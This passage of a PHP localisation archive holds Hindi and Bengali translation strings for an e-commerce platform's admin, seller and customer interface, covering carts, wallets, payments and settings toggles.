'want_to_Turn_OFF_the_Cash_On_Delivery_option' => 'डिलीवरी विकल्प पर नकद बंद करना चाहते हैं', 'want_to_Turn_OFF_the_Digital_Payment_option' => 'डिजिटल भुगतान विकल्प को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_Email_Verification' => 'ईमेल सत्यापन को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_Google_Play_Store_button' => 'Google Play Store बटन को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_Guest_Checkout_Mode' => 'अतिथि चेकआउट मोड को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_OTP_Verification' => 'ओटीपी सत्यापन को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_Offline_Payment_option' => 'ऑफ़लाइन भुगतान विकल्प को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_Set_Minimum_Order_Amount_option' => 'सेट न्यूनतम ऑर्डर राशि विकल्प को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_Temporary_Close_option' => 'अस्थायी करीबी विकल्प को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_sendgrid_mail_config_option' => 'SendGrid मेल कॉन्फ़िगरेशन विकल्प को बंद करना चाहते हैं', 'want_to_Turn_OFF_the_smtp_mail_config_option' => 'SMTP मेल कॉन्फ़िगरेशन विकल्प को बंद करना चाहते हैं', 'want_to_Turn_ON_' => 'चालू करना चाहते हैं', 'want_to_Turn_ON_Add_Fund_to_Wallet_option' => 'ऐड फंड टू वॉलेट विकल्प चालू करना चाहते हैं', 'want_to_Turn_ON_Billing_Address_in_Checkout' => 'चेकआउट में बिलिंग पते को चालू करना चाहते हैं', 'want_to_Turn_ON_Customer_Wallet' => 'ग्राहक बटुए को चालू करना चाहते हैं', 'want_to_Turn_ON_Delivery_Available_Country' => 'डिलीवरी उपलब्ध देश को चालू करना चाहते हैं', 'want_to_Turn_ON_Delivery_Available_Zip_Code_Area' => 'डिलीवरी उपलब्ध ज़िप कोड क्षेत्र को चालू करना चाहते हैं', 'want_to_Turn_ON_Digital_Product' => 'डिजिटल उत्पाद को चालू करना चाहते हैं', 'want_to_Turn_ON_Free_Delivery' => 'मुफ्त डिलीवरी चालू करना चाहते हैं', 'want_to_Turn_ON_Loyalty_Point' => 'वफादारी बिंदु को चालू करना चाहते हैं', 'want_to_Turn_ON_Minimum_Order_Amount' => 'न्यूनतम आदेश राशि चालू करना चाहते हैं', 'want_to_Turn_ON_Order_Delivery_Verification' => 'ऑर्डर डिलीवरी सत्यापन को चालू करना चाहते हैं', 'want_to_Turn_ON_POS_for_Seller' => 'विक्रेता के लिए पीओएस चालू करना चाहते हैं', 'want_to_Turn_ON_Product_Brand' => 'उत्पाद ब्रांड को चालू करना चाहते हैं', 'want_to_Turn_ON_Referral_And_Earning_option' => 'रेफरल और कमाई के विकल्प को चालू करना चाहते हैं', 'want_to_Turn_ON_Refund_to_Wallet_option' => 'बटुए के विकल्प पर रिफंड चालू करना चाहते हैं', 'want_to_Turn_ON_Self_Registration' => 'स्वयं पंजीकरण चालू करना चाहते हैं', 'want_to_Turn_ON_the_App_Store_button' => 'ऐप स्टोर बटन चालू करना चाहते हैं', 'want_to_Turn_ON_the_Cash_On_Delivery_option' => 'डिलीवरी विकल्प पर नकद चालू करना चाहते हैं', 'want_to_Turn_ON_the_Digital_Payment_option' => 'डिजिटल भुगतान विकल्प चालू करना चाहते हैं', 'want_to_Turn_ON_the_Email_Verification' => 'ईमेल सत्यापन को चालू करना चाहते हैं', 'want_to_Turn_ON_the_Google_Play_Store_button' => 'Google Play Store बटन चालू करना चाहते हैं', 'want_to_Turn_ON_the_Guest_Checkout_Mode' => 'अतिथि चेकआउट मोड को चालू करना चाहते हैं', 'want_to_Turn_ON_the_OTP_Verification' => 'ओटीपी सत्यापन को चालू करना चाहते हैं', 'want_to_Turn_ON_the_Offline_Payment_option' => 'ऑफ़लाइन भुगतान विकल्प चालू करना चाहते हैं', 'want_to_Turn_ON_the_Set_Minimum_Order_Amount_option' => 'सेट न्यूनतम ऑर्डर राशि विकल्प चालू करना चाहते हैं', 'want_to_Turn_ON_the_Temporary_Close_option' => 'अस्थायी करीबी विकल्प को चालू करना चाहते हैं', 'want_to_Turn_ON_the_sendgrid_mail_configt_option' => 'SendGrid मेल कॉन्फ़िगरेट विकल्प को चालू करना चाहते हैं', 'want_to_Turn_ON_the_smtp_mail_configt_option' => 'SMTP मेल कॉन्फ़िगर विकल्प चालू करना चाहते हैं', 'want_to_Turn_Off_' => 'बंद करना चाहते हैं', 'want_to_Turn_Off_the_Cash_On_Delivery_option' => 'डिलीवरी विकल्प पर नकद बंद करना चाहते हैं', 'want_to_Turn_Off_the_Digital_Payment_option' => 'डिजिटल भुगतान विकल्प को बंद करना चाहते हैं', 'want_to_Turn_Off_the_Offline_Payment_option' => 'ऑफ़लाइन भुगतान विकल्प को बंद करना चाहते हैं', 'want_to_Turn_On_' => 'चालू करना चाहते हैं', 'want_to_Turn_On_the_Cash_On_Delivery_option' => 'डिलीवरी विकल्प पर नकद चालू करना चाहते हैं', 'want_to_Turn_On_the_Digital_Payment_option' => 'डिजिटल भुगतान विकल्प चालू करना चाहते हैं', 'want_to_Turn_On_the_Offline_Payment_option' => 'ऑफ़लाइन भुगतान विकल्प चालू करना चाहते हैं', 'want_to_add_this_product' => 'इस उत्पाद को जोड़ना चाहते हैं', 'want_to_cancel_this_order ' => 'इस आदेश को रद्द करना चाहते हैं', 'want_to_change_status' => 'स्थिति बदलना चाहते हैं', 'want_to_change_the_shipping_responsibility_to_Inhouse' => 'इनहाउस में शिपिंग जिम्मेदारी बदलना चाहते हैं', 'want_to_change_the_shipping_responsibility_to_Seller_Wise' => 'विक्रेता के लिए शिपिंग जिम्मेदारी बदलना चाहते हैं', 'want_to_clear_all_cart ' => 'सभी कार्ट को साफ करना चाहते हैं', 'want_to_clear_all_compare_list ' => 'सभी तुलना सूची को साफ़ करना चाहते हैं', 'want_to_clear_all_wishlist ' => 'सभी विशलिस्ट को साफ करना चाहते हैं', 'want_to_delete_this_account' => 'इस खाते को हटाना चाहते हैं', 'want_to_delete_this_account ' => 'इस खाते को हटाना चाहते हैं', 'want_to_delete_this_address ' => 'इस पते को हटाना चाहते हैं', 'want_to_delete_this_coupon ' => 'इस कूपन को हटाना चाहते हैं', 'want_to_delete_this_customer' => 'इस ग्राहक को हटाना चाहते हैं', 'want_to_delete_this_item' => 'इस आइटम को हटाना चाहते हैं', 'want_to_delete_this_item ' => 'इस आइटम को हटाना चाहते हैं', 'want_to_delete_this_method' => 'इस विधि को हटाना चाहते हैं', 'want_to_make_default_method' => 'डिफ़ॉल्ट विधि बनाना चाहते हैं', 'want_to_remove_compare_list_product ' => 'तुलना सूची उत्पाद को हटाना चाहते हैं', 'want_to_turn_OFF_msg91_sms' => 'MSG91 एसएमएस को बंद करना चाहते हैं', 'want_to_turn_OFF_nexmo_sms' => 'नेक्समो एसएमएस बंद करना चाहते हैं', 'want_to_turn_OFF_releans' => 'रिले को बंद करना चाहते हैं', 'want_to_turn_OFF_twilio_sms' => 'ट्विलियो एसएमएस बंद करना चाहते हैं', 'want_to_turn_OFF_twofactor_sms' => 'Twofactor SMS बंद करना चाहते हैं', 'want_to_turn_ON_msg91_sms' => 'MSG91 एसएमएस को चालू करना चाहते हैं', 'want_to_turn_ON_nexmo_sms' => 'नेक्समो एसएमएस चालू करना चाहते हैं', 'want_to_turn_ON_releans' => 'रिले को चालू करना चाहते हैं', 'want_to_turn_ON_twilio_sms' => 'ट्विलियो एसएमएस चालू करना चाहते हैं', 'want_to_turn_ON_twofactor_sms' => 'Twofactor SMS चालू करना चाहते हैं', 'want_to_unfollow_this_shop' => 'इस दुकान को अनफॉलो करना चाहते हैं', 'want_to_update_status' => 'स्थिति अपडेट करना चाहते हैं', 'want_tocancel_this_order ' => 'इस आदेश को tocancel चाहते हैं', 'warely' => 'सख्त', 'warning' => 'चेतावनी', 'wc-327477' => 'WC-327477', 'wc-327478' => 'WC-327478', 'wc-327479' => 'WC-327479', 'we_are_sorry' => 'हमें खेद है', 'we_are_using_the_most_advanced_security_to_provide_you_the_best_experience_ever.' => 'हम आपको सबसे अच्छा अनुभव प्रदान करने के लिए सबसे उन्नत सुरक्षा का उपयोग कर रहे हैं।', 'we_will_email_you_a_temporary_code.' => 'हम आपको एक अस्थायी कोड ईमेल करेंगे।', 'wearable' => 'पहनने योग्य', 'web' => 'वेब', 'web_&_app_settings' => 'वेब और ऐप सेटिंग्स', 'web_admin' => 'वेब व्यवस्थापक', 'web_application' => 'वेब अनुप्रयोग', 'web_color_setup' => 'वेब रंग सेटअप', 'web_config' => 'वेब विन्यास', 'web_fav_icon' => 'वेब फेव आइकन', 'web_footer' => 'वेब पाद', 'website' => 'वेबसाइट', 'website_Color' => 'वेबसाइट रंग', 'website_Favicon' => 'Website Favicon', 'website_Footer_Logo' => 'वेबसाइट पाद लोगो', 'website_Header_Logo' => 'वेबसाइट प्रधान लोगो', 'website_problem' => 'वेबसाइट समस्या', 'week' => 'सप्ताह', 'welcome_back_to_seller_login' => 'विक्रेता लॉगिन में वापस आपका स्वागत है', 'welcome_message' => 'स्वागत संदेश', 'welcome_to' => 'आपका स्वागत है', 'welcome_to_dashboard' => 'डैशबोर्ड में आपका स्वागत है', 'welcome_to_your_dashboard' => 'अपने डैशबोर्ड में आपका स्वागत है', 'what_is_App_Version' => 'ऐप संस्करण क्या है', 'what_you_need' => 'जिसकी आपको जरूरत है', 'whatsApp' => 'WhatsApp', 'whatsapp_information_update_successfully' => 'व्हाट्सएप जानकारी सफलतापूर्वक अपडेट करें', 'whatsapp_number' => 'व्हाट्सएप नंबर', 'whatsapp_phone_number' => 'व्हाट्सएप फोन नंबर', 'when_a_deliveryman_arrives_for_delivery_they_must_provide_the_code_to_the_deliveryman_to_verify_the_order_delivery' => 'जब एक डिलीवरीमैन डिलीवरी के लिए आता है तो उन्हें ऑर्डर डिलीवरी को सत्यापित करने के लिए डिलीवरीमैन को कोड प्रदान करना होगा', 'when_converting_loyalty_points_to_currency_customers_will_require_the_minimum_loyalty_point_set_by_the_admin' => 'जब मुद्रा ग्राहकों के लिए वफादारी बिंदुओं को परिवर्तित करते हैं, तो उन्हें व्यवस्थापक द्वारा निर्धारित न्यूनतम वफादारी बिंदु की आवश्यकता होगी', 'where_to_get_this_information ' => 'यह जानकारी कहां से प्राप्त करें', 'which_will_be_shown_in_search_engine_results' => 'जो खोज इंजन परिणामों में दिखाया जाएगा', 'will be sent to your number provide that' => 'आपके नंबर पर भेजा जाएगा', 'wish' => 'इच्छा', 'wish_Listed_Products' => 'सूचीबद्ध उत्पादों की कामना', 'wish_list' => 'इच्छा सूची', 'wish_listed' => 'इच्छा सूचीबद्ध', 'wishes' => 'शुभकामनाएं', 'wishlist' => 'इच्छा-सूची', 'wishlist_Removed' => 'विशलिस्ट हटा दिया', 'wishlist_sort_by_(high_to_low)' => 'विशलिस्ट सॉर्ट द्वारा (उच्च से निम्न)', 'wishlist_sort_by_(low_to_high)' => 'विशलिस्ट सॉर्ट द्वारा (कम से उच्च)', 'wishlists' => 'इच्छा सूची', 'withdraw' => 'निकालना', 'withdraw requests' => 'अनुरोध वापस लें', 'withdraw_Request' => 'अनुरोध वापस लें', 'withdraw_Request_Table' => 'अनुरोध तालिका वापस लें', 'withdraw_able_balance' => 'सक्षम संतुलन वापस लें', 'withdraw_method_list' => 'विधि सूची वापस लें', 'withdrawable_balance' => 'वापस लेने योग्य संतुलन', 'withdrawal methods' => 'निकासी के तरीके', 'withdrawal_Methods' => 'निकासी के तरीके', 'withdrawble_Balance' => 'निकासी संतुलन', 'withdrawn' => 'वापस लिया गया', 'withdraws' => 'निकाल लेता है', 'women s shoes' => 'महिलाओं के जूते', 'write_coupon_code_here' => 'कूपन कोड यहां लिखें', 'write_something' => 'कुछ लिखना', 'write_your_message_here' => 'यहां अपना संदेश लिखें', 'yes' => 'हाँ', 'yes_change_it' => 'हाँ इसे बदलो', 'yes_delete_it' => 'हाँ इसे हटा दें', 'yes_i_Accept' => 'हां मुझे स्वीकार है', 'you do not have sufficient balance for pay this order!!' => 'आपके पास इस आदेश का भुगतान करने के लिए पर्याप्त शेष राशि नहीं है !!', 'you_Get_Free_Delivery_Bonus' => 'आपको मुफ्त डिलीवरी बोनस मिलता है', 'you_are_already_login_proceed' => 'आप पहले से ही लॉगिन कर रहे हैं', 'you_can_check_our' => 'आप हमारी जाँच कर सकते हैं', 'you_can_download_the_example_file_to_understand_how_the_data_must_be_filled.' => 'आप यह समझने के लिए उदाहरण फ़ाइल डाउनलोड कर सकते हैं कि डेटा कैसे भरा जाना चाहिए।', 'you_can_get_brand_and_category_id_from_their_list_please_input_the_right_ids.' => 'आप उनकी सूची से ब्रांड और श्रेणी आईडी प्राप्त कर सकते हैं कृपया सही आईडी इनपुट करें।', 'you_can_not_change_it' => 'आप इसे नहीं बदल सकते', 'you_can_refund_request_after_the_product_is_delivered!' => 'उत्पाद वितरित होने के बाद आप अनुरोध वापस कर सकते हैं!', 'you_can_review_after_product_is_delivered!' => 'उत्पाद वितरित होने के बाद आप समीक्षा कर सकते हैं!', 'you_can_review_after_the_product_is_delivered!' => 'उत्पाद वितरित होने के बाद आप समीक्षा कर सकते हैं!', 'you_can_setup_theme_wise_required_data_from_there.' => 'आप वहां से थीम वाइज आवश्यक डेटा सेटअप कर सकते हैं।', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_image_path.' => 'आप गैलरी और कॉपी इमेज पाथ से उत्पाद फ़ोल्डर में अपने उत्पाद छवियों को अपलोड कर सकते हैं।', 'you_can_use_this_ID_to_track_your_order_later' => 'आप अपने आदेश को बाद में ट्रैक करने के लिए इस आईडी का उपयोग कर सकते हैं', 'you_cannot_add_product_to_cart_from_this_shop_for_now' => 'आप अभी के लिए इस दुकान से गाड़ी में उत्पाद नहीं जोड़ सकते', 'you_do_not_have_sufficient_balance_for_pay_this_order!!' => 'आपके पास इस आदेश का भुगतान करने के लिए पर्याप्त शेष राशि नहीं है !!', 'you_have_new order' => 'आपके पास नया आदेश है', 'you_have_new_order' => 'आपके पास नया आदेश है', 'you_have_switched_theme_successfully' => 'आपने थीम को सफलतापूर्वक स्विच कर दिया है', 'you_have_to_input_all_the_banners_again_for_each_section' => 'आपको प्रत्येक अनुभाग के लिए फिर से सभी बैनर इनपुट करना होगा', 'you_made_your_earning' => 'आपने अपनी कमाई की', 'you_may_also_like' => 'आपको यह भी पसंद आ सकता हैं', 'you_order_has_been_confirmed_and_will_be_shipped_according_to_the_method_you_selected' => 'आपको ऑर्डर की पुष्टि की गई है और आपके द्वारा चयनित विधि के अनुसार भेज दिया जाएगा', 'you_setup_those_data_from_there.' => 'आप वहां से उन डेटा को सेटअप करते हैं।', 'you_want_to_add_fund' => 'आप फंड जोड़ना चाहते हैं', 'you_want_to_remove_all_items_from_cart' => 'आप कार्ट से सभी आइटम निकालना चाहते हैं', 'you_will not_be_able_to_revert_this' => 'आप इसे वापस नहीं कर पाएंगे', 'you_will_get_response' => 'आपको प्रतिक्रिया मिलेगी', 'you_will_lost_the_this_addon' => 'आप इस ऐडऑन को खो देंगे', 'you_will_lost_the_this_theme' => 'आप इस विषय को खो देंगे', 'you_will_not_be able_to_revert_this' => 'आप इसे वापस नहीं कर पाएंगे', 'you_will_not_be_able_to_revert_this' => 'आप इसे वापस नहीं कर पाएंगे', 'you_will_receive_an_email_confirmation_when_your_order_is_completed' => 'जब आपका ऑर्डर पूरा हो जाएगा तो आपको एक ईमेल पुष्टिकरण प्राप्त होगा', 'you_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'जब आपका ऑर्डर पूरा हो जाएगा तो आपको एक ईमेल पुष्टि मिलेगी।', 'you_wont_be_able_to_revert_this' => 'आप इसे वापस करने में सक्षम नहीं होंगे', 'your' => 'आपका', 'your loyalty point will convert to currency and transfer to your wallet' => 'आपका वफादारी बिंदु मुद्रा में परिवर्तित हो जाएगा और आपके वॉलेट में स्थानांतरित हो जाएगा', 'your_Email_Address' => 'आपका ईमेल पता', 'your_Order_ID' => 'आपका ऑर्डर आईडी', 'your_account_is_ready_to_use' => 'आपका खाता उपयोग करने के लिए तैयार है', 'your_address' => 'तुम्हारा पता', 'your_cart_is_empty' => 'आपकी गाड़ी खाली है', 'your_current_balance' => 'आपका वर्तमान संतुलन', 'your_email' => 'आपका ईमेल', 'your_first_name' => 'आपका प्रथम नाम', 'your_loyalty_point_will_convert_to_currency_and_transfer_to_your_wallet' => 'आपका वफादारी बिंदु मुद्रा में परिवर्तित हो जाएगा और आपके वॉलेट में स्थानांतरित हो जाएगा', 'your_name' => 'आपका नाम', 'your_order_confirm' => 'आपका आदेश पुष्टि करता है', 'your_order_has_been_placed_successfully' => 'आपका आदेश सफलतापूर्वक रखा गया है', 'your_order_has_been_placed_successfully!' => 'आपका आदेश सफलतापूर्वक रखा गया है!', 'your_order_is_completed' => 'आपका आदेश पूरा हो गया है', 'your_order_placed_successfully' => 'आपका आदेश सफलतापूर्वक रखा गया', 'your_password_must_be_at_least_8_characters' => 'आपका पासवर्ड कम से कम 8 अक्षर होना चाहिए', 'your_personal_code' => 'आपका व्यक्तिगत कोड', 'your_phone' => 'अपने फोन को', 'your_phone_number' => 'आपका फोन नंबर', 'your_server_php' => 'आपका सर्वर php', 'your_shop_address' => 'आपकी दुकान का पता', 'youtube_video_link' => 'YouTube वीडियो लिंक', 'z_a' => 'Z a', 'z_to_a_Order' => 'एक आदेश के लिए z', 'z_to_a_order' => 'एक आदेश के लिए z', 'zip' => 'ज़िप', 'zip_Code' => 'ज़िप कोड', 'zip_code' => 'ज़िप कोड', 'zone' => 'क्षेत्र', ); PK ! ��� � bd/messages.phpnu �[��� <?php return array ( '3rd_party' => 'থার্ড পার্টি', '4 to 6 days' => '4 থেকে 6 দিন', '4_to_6_days' => '4 থেকে 6 দিন', '7 Days Return Policy' => '7 দিনের রিটার্ন পলিসি', '7_Days_Return_Policy' => '7 দিনের রিটার্ন পলিসি', '8+_Character' => '8+ ক্যারেক্টার', '8+_characters_required' => '8+ অক্ষর প্রয়োজন', 'A-Z' => 'এ-জেড', 'A/C_No' => 'এ/সি নং', 'ADD URI' => 'URI যুক্ত করুন', 'ADDRESSES' => 'ঠিকানা', 'ADD_URI' => 'URI যুক্ত করুন', 'APP_DEBUG' => 'অ্যাপ ডিবাগ', 'APP_MODE' => 'অ্যাপ মোড', 'APP_NAME' => 'অ্যাপ্লিকেশন নাম', 'APP_URL' => 'অ্যাপ্লিকেশন url', 'ARRIVALS' => 'আগমন', 'ASE/DESC' => 'এএসই/ডেস্ক', 'AVC' => 'এভিসি', 'A_Z' => 'এ জেড', 'A_to_Z' => 'এ থেকে জেড', 'A_to_Z_Order' => 'এ টু জেড অর্ডার', 'Abc' => 'এবিসি', 'About Our Company' => 'আমাদের প্রতিষ্ঠান সম্পর্কে', 'About Us' => 'এবাউট আস', 'About_Company' => 'কোম্পানী সম্পর্কে', 'About_Our_Company' => 'আমাদের প্রতিষ্ঠান সম্পর্কে', 'About_Us' => 'এবাউট আস', 'About_us' => 'এবাউট আস', 'Accept the reCAPTCHA Terms of Service' => 'পরিষেবার recaptcha টার্মস গ্রহণ করুন', 'Accept_All_Cookies' => 'সমস্ত কুকিজ গ্রহণ করুন', 'Account' => 'অ্যাকাউন্ট', 'Account Name' => 'একাউন্টের নাম', 'Account No' => 'একাউন্ট নাম্বার', 'Account _number' => 'একাউন্ট নাম্বার', 'Account_Information' => 'একাউন্টের তথ্য', 'Account_Number' => 'একাউন্ট নাম্বার', 'Accounts' => 'অ্যাকাউন্ট', 'Action' => 'কর্ম', 'Activate' => 'সক্রিয়', 'Active' => 'সক্রিয়', 'Active Product' => 'সক্রিয় পণ্য', 'Active_Products' => 'সক্রিয় পণ্য', 'Add' => 'যোগ করুন', 'Add Help Topic' => 'সহায়তা বিষয় যুক্ত করুন', 'Add New Currency' => 'নতুন মুদ্রা যুক্ত করুন', 'Add Product' => 'পণ্য যুক্ত করুন', 'Add Shipping' => 'শিপিং যোগ করুন', 'Add a ' => 'যুক্ত কর একটি', 'Add new' => 'নতুন যোগ করুন', 'Add new delivery-man' => 'নতুন ডেলিভারি-ম্যান যুক্ত করুন', 'Add new notification' => 'নতুন নোটিফিকেশন যুক্ত করুন', 'Add new product' => 'নতুন পণ্য যুক্ত করুন', 'Add_Address' => 'ঠিকানা যোগ করুন', 'Add_Domain_(For_ex= _demo.6amtech.com)' => 'ডোমেন যুক্ত করুন (এক্সাম্পল জন্য=> ডেমো .6amtech.com)', 'Add_Fields' => 'ক্ষেত্র যুক্ত করুন', 'Add_Fund_To_Wallet' => 'ওয়ালেটে ফান্ড যোগ করুন', 'Add_New' => 'নতুন যোগ করুন', 'Add_New_Card' => 'নতুন কার্ড যুক্ত করুন', 'Add_New_Employee' => 'নতুন কর্মচারী যুক্ত করুন', 'Add_New_Field' => 'নতুন ক্ষেত্র যুক্ত করুন', 'Add_New_Product' => 'নতুন পণ্য যুক্ত করুন', 'Add_New_Seller' => 'নতুন বিক্রেতা যুক্ত করুন', 'Add_Product' => 'পণ্য যুক্ত করুন', 'Add_a _label_(Ex= _abc_company)' => 'একটি লেভেল যুক্ত করুন (এক্সাম্পল=> এবিসি সংস্থা)', 'Add_dynamic_url_to_secure_admin_login_access.' => 'অ্যাডমিন লগইন অ্যাক্সেস সুরক্ষিত করতে ডায়নামিক ইউআরএল যুক্ত করুন।', 'Add_dynamic_url_to_secure_employee_login_access.' => 'কর্মচারী লগইন অ্যাক্সেস সুরক্ষিত করতে ডায়নামিক ইউআরএল যুক্ত করুন।', 'Add_fields' => 'ক্ষেত্র যুক্ত করুন', 'Add_method' => 'পদ্ধতি যুক্ত করুন', 'Add_new' => 'নতুন যোগ করুন', 'Add_new_product' => 'নতুন পণ্য যুক্ত করুন', 'Add_to_cart' => 'কার্টে যোগ করুন', 'Address' => 'ঠিকানা', 'Address Update Successfully' => 'সাফল্যের সাথে ঠিকানা আপডেট হয়েছে', 'Address_Type' => 'ঠিকানা প্রকার', 'Addresses' => 'ঠিকানা', 'Admin' => 'অ্যাডমিন', 'Admin Shop Banner' => 'অ্যাডমিন শপ ব্যানার', 'Admin_Commission' => 'অ্যাডমিন কমিশন', 'Admin_Discount' => 'অ্যাডমিন ছাড়', 'Admin_Earning' => 'অ্যাডমিন উপার্জন', 'Admin_Earning_Report' => 'অ্যাডমিন আয়ের প্রতিবেদন', 'Admin_Net_Income' => 'অ্যাডমিন নেট আয়', 'Admin_also_reward_their_top_customers_with_wallet_money' => 'আমিন তাদের শীর্ষ গ্রাহকদের ওয়ালেট অর্থ দিয়ে পুরস্কৃত করুন', 'Air Conditioner' => 'এয়ার কন্ডিশনার', 'All' => 'সব', 'All Brands Page' => 'সমস্ত ব্র্যান্ড পৃষ্ঠা', 'All Categories' => 'সব ধরনের', 'All Category Page' => 'সমস্ত ক্যাটাগরি পৃষ্ঠা', 'All Seller Page' => 'সমস্ত বিক্রেতা পৃষ্ঠা', 'All copy right reserved' => 'সমস্ত কপি রাইট সংরক্ষিত', 'All input field is required' => 'সমস্ত ইনপুট ক্ষেত্র প্রয়োজন', 'All input field required' => 'সমস্ত ইনপুট ক্ষেত্র প্রয়োজন', 'All_Brand' => 'সমস্ত ব্র্যান্ড', 'All_Brands' => 'সমস্ত ব্র্যান্ড', 'All_Brands_Page' => 'সমস্ত ব্র্যান্ড পৃষ্ঠা', 'All_Cart_Product_List' => 'সমস্ত কার্ট পণ্য তালিকা', 'All_Categories' => 'সব ধরনের', 'All_Order_List' => 'সমস্ত অর্ডার তালিকা', 'All_Pages_Banner' => 'সমস্ত পৃষ্ঠাগুলি ব্যানার', 'All_Pages_Banner ' => 'সমস্ত পৃষ্ঠাগুলি ব্যানার', 'All_Priority' => 'সমস্ত অগ্রাধিকার', 'All_Product' => 'সমস্ত পণ্য', 'All_Products' => 'সব পণ্য', 'All_Seller_Page' => 'সমস্ত বিক্রেতা পৃষ্ঠা', 'All_Sellers' => 'সমস্ত বিক্রেতা', 'All_Shops' => 'সব দোকান', 'All_Status' => 'সমস্ত স্ট্যাটাস', 'All_Stores' => 'সমস্ত স্টোর', 'All_Wishing_Product_List' => 'সমস্ত উইশলিস্ট পণ্য তালিকা', 'All_copy_right_reserved_©_2023_' => 'সমস্ত কপি রাইট সংরক্ষিত © 2023', 'All_products' => 'সব পণ্য', 'Already Withdrawn' => 'ইতিমধ্যে উইথড্র', 'Already in your wishlist' => 'ইতিমধ্যে আপনার উইশ লিস্ট', 'Already_Settled' => 'ইতিমধ্যে নিষ্পত্তি', 'Already_Withdrawn' => 'ইতিমধ্যে উইথড্র', 'Already_have_store' => 'ইতিমধ্যে স্টোর আছে', 'Already_have_store ' => 'ইতিমধ্যে স্টোর আছে', 'Amount' => 'পরিমাণ', 'An' => 'একটি', 'An_OTP_(One_Time_Password)_has_been_sent_to' => 'একটি ওটিপি (এক সময়ের পাসওয়ার্ড) পাঠানো হয়েছে', 'An_OTP_(One_Time_Password)_has_been_sent_to_your_email' => 'আপনার ইমেলটিতে একটি ওটিপি (এক সময়ের পাসওয়ার্ড) প্রেরণ করা হয়েছে', 'Analysis' => 'বিশ্লেষণ', 'Analytic_Script' => 'বিশ্লেষণমূলক স্ক্রিপ্ট', 'Analytics' => 'বিশ্লেষণ', 'Another' => 'অন্য', 'Another_Address' => 'অন্য ঠিকানা', 'Answer' => 'উত্তর', 'App_Logo' => 'অ্যাপ লোগো', 'App_Settings' => 'অ্যাপ সেটিংস', 'Application' => 'আবেদন', 'Application System' => 'অ্যাপ্লিকেশন সিস্টেম', 'Applications' => 'অ্যাপ্লিকেশন', 'Apply' => 'প্রয়োগ করুন', 'Apply_Coupon_Code' => 'কুপন কোড প্রয়োগ করুন', 'Approve' => 'অনুমোদন', 'Approved' => 'অনুমোদিত', 'Are you sure' => 'আপনি কি নিশ্চিত', 'Are you sure ' => 'আপনি কি নিশ্চিত', 'Are you sure Change this' => 'আপনি কি নিশ্চিত এটি পরিবর্তন করবেন', 'Are you sure Change this ' => 'আপনি কি নিশ্চিত এটি পরিবর্তন করবেন', 'Are you sure delete this' => 'আপনি কি নিশ্চিত এটি মুছবেন?', 'Are you sure delete this ' => 'আপনি কি নিশ্চিত এটি মুছবেন?', 'Are you sure delete this FAQ' => 'আপনি কি নিশ্চিত যে এই FAQ মুছবেন?', 'Are you sure delete this social media' => 'আপনি কি নিশ্চিত যে এই সোশ্যাল মিডিয়া মুছবেন?', 'Are you sure to delete this' => 'আপনি কি এটি মুছতে চান?', 'Are you sure to delete this ' => 'আপনি কি এটি মুছতে ভুলবেন না?', 'Are you sure you want to Delete' => 'আপনি মুছে ফেলতে চান', 'Are_you_sure' => 'আপনি কি নিশ্চিত', 'Are_you_sure ' => 'আপনি কি নিশ্চিত', 'Are_you_sure_delete_this' => 'আপনি কি নিশ্চিত এটি মুছবেন?', 'Are_you_sure_delete_this_banner' => 'আপনি কি নিশ্চিত যে এই ব্যানারটি মুছবেন?', 'Are_you_sure_delete_this_brand' => 'আপনি কি নিশ্চিত যে এই ব্র্যান্ডটি মুছবেন?', 'Are_you_sure_delete_this_role' => 'আপনি কি নিশ্চিত যে এই ভূমিকাটি মুছবেন?', 'Are_you_sure_remove_this_product' => 'আপনি কি নিশ্চিত যে এই পণ্যটি সরাবেন?', 'Are_you_sure_to_delete_this' => 'আপনি কি এটি মুছতে চান?', 'Are_you_sure_to_delete_this ' => 'আপনি কি এটি মুছতে চান?', 'Are_you_sure_to_delete_this_sub_category' => 'আপনি কি এই সাব ক্যাটাগরিটি মুছতে চান?', 'Aready_Withdrawn' => 'অলরেডি উইথড্র', 'Arkohub' => 'আরকোহাব', 'Asc/Dsc' => 'এএসসি/ডিএসসি', 'Ask_about_this_product' => 'এই পণ্য সম্পর্কে জিজ্ঞাসা করুন', 'Attachment' => 'সংযুক্তি', 'Attribute' => 'ফীচার', 'Attribute_Name' => 'নাম গুন', 'Attribute_Setup' => 'এট্রিবিউট সেটআপ', 'Attribute_deleted_successfully' => 'ফীচার সফলভাবে মুছে ফেলা হয়েছে', 'Attributes' => 'ফীচার', 'Audio' => 'অডিও', 'AuthKey_KeyID.p8' => 'Authkey keyid.p8', 'Authentic_Product' => 'খাঁটি পণ্য', 'Authentic_Products' => 'খাঁটি পণ্য', 'Authentication' => 'প্রমাণীকরণ', 'Authorized redirect URIs' => 'অনুমোদিত পুনঃনির্দেশ URI', 'Available color' => 'এভেইল্যাবলে রঙ', 'Available_Color' => 'এভেইল্যাবলে রঙ', 'Average' => 'গড়', 'Average Product Value' => 'গড় পণ্য মান', 'Average Ratings' => 'গড় রেটিং', 'Average_Earning_Value' => 'গড় উপার্জনের মান', 'Average_Product_Value' => 'গড় পণ্য মান', 'Average_Ratings' => 'গড় রেটিং', 'Average_Sales_Value' => 'গড় বিক্রয় মূল্য', 'Axxelus' => 'অ্যাক্সেলাস', 'B. Store' => 'বি স্টোর', 'B. Technology' => 'বি প্রযুক্তি', 'BUYER_USERNAME' => 'ক্রেতা ব্যবহারকারীর নাম', 'Back' => 'পেছনে', 'Back to Shipping' => 'শিপিং ফিরে যান', 'Back_Again' => 'ফিরে আবার', 'Back_to_seller_list' => 'বিক্রেতার তালিকায় ফিরে যান', 'Background Music for commercial use' => 'বাণিজ্যিক ব্যবহারের জন্য পটভূমি সংগীত', 'Bags & Shoes' => 'ব্যাগ এন্ড জুতা', 'ব্যাংক তথ্য' => 'ব্যাংক তথ্য', 'ব্যাংক তথ্য View' => 'ব্যাংক তথ্য দেখুন', 'ব্যাংক তথ্যrmation' => 'ব্যাংক তথ্য', 'Bank Name' => 'ব্যাংকের নাম', 'Bank_Name' => 